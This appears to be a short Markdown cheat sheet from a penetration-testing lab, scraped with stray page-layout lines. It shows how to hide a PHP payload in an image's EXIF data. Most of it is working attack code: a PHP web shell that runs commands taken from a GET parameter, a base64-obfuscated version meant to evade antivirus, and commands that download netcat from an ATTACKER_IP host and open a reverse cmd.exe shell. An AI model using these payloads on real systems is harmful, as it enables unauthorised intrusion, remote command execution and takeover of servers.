36 lines
909 B
Markdown
36 lines
909 B
Markdown
|
# PHP Payload in Image ExifData
|
||
|
|
|
||
|
|
* Test
|
||
|
|
```sh
|
||
|
|
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
|
||
|
|
```
|
||
|
|
|
||
|
|
* Build Payload with AV evasion
|
||
|
|
```sh
|
||
|
|
<?php
|
||
|
|
$cmd = $_GET["wreath"];
|
||
|
|
if (isset($cmd)){
|
||
|
|
echo "<pre>" . shell_exec($cmd) . "</pre>";
|
||
|
|
}
|
||
|
|
die();
|
||
|
|
?>
|
||
|
|
```
|
||
|
|
|
||
|
|
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
|
||
|
|
|
||
|
|
* Obfuscated code with escaped `$`
|
||
|
|
```sh
|
||
|
|
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
|
||
|
|
```
|
||
|
|
* Upload and execute commands with get parameter `?wreath=systeminfo`
|
||
|
|
|
||
|
|
## Uploading Reverse through Webshell
|
||
|
|
* Parameter for Webshell
|
||
|
|
```sh
|
||
|
|
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
|
||
|
|
```
|
||
|
|
* Trigger uploaded netcat
|
||
|
|
```sh
|
||
|
|
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
|
||
|
|
```
|